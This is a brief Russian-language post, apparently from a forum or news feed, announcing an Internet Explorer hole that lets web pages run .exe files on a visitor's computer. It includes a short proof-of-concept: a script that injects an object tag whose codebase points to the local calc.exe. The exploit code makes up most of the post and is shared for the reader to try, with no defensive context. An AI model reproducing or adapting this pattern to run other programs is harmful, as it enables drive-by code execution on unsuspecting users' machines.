Найдена дыра в MSIE, позволяющая запускать на вашем компьютере .exe файлы. Говорят - у многих работает.
Выглядит это примерно так:
<span id="oSpan"></span>
<script language="jscript" defer>
oSpan.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/calc.exe"></object>';
</script>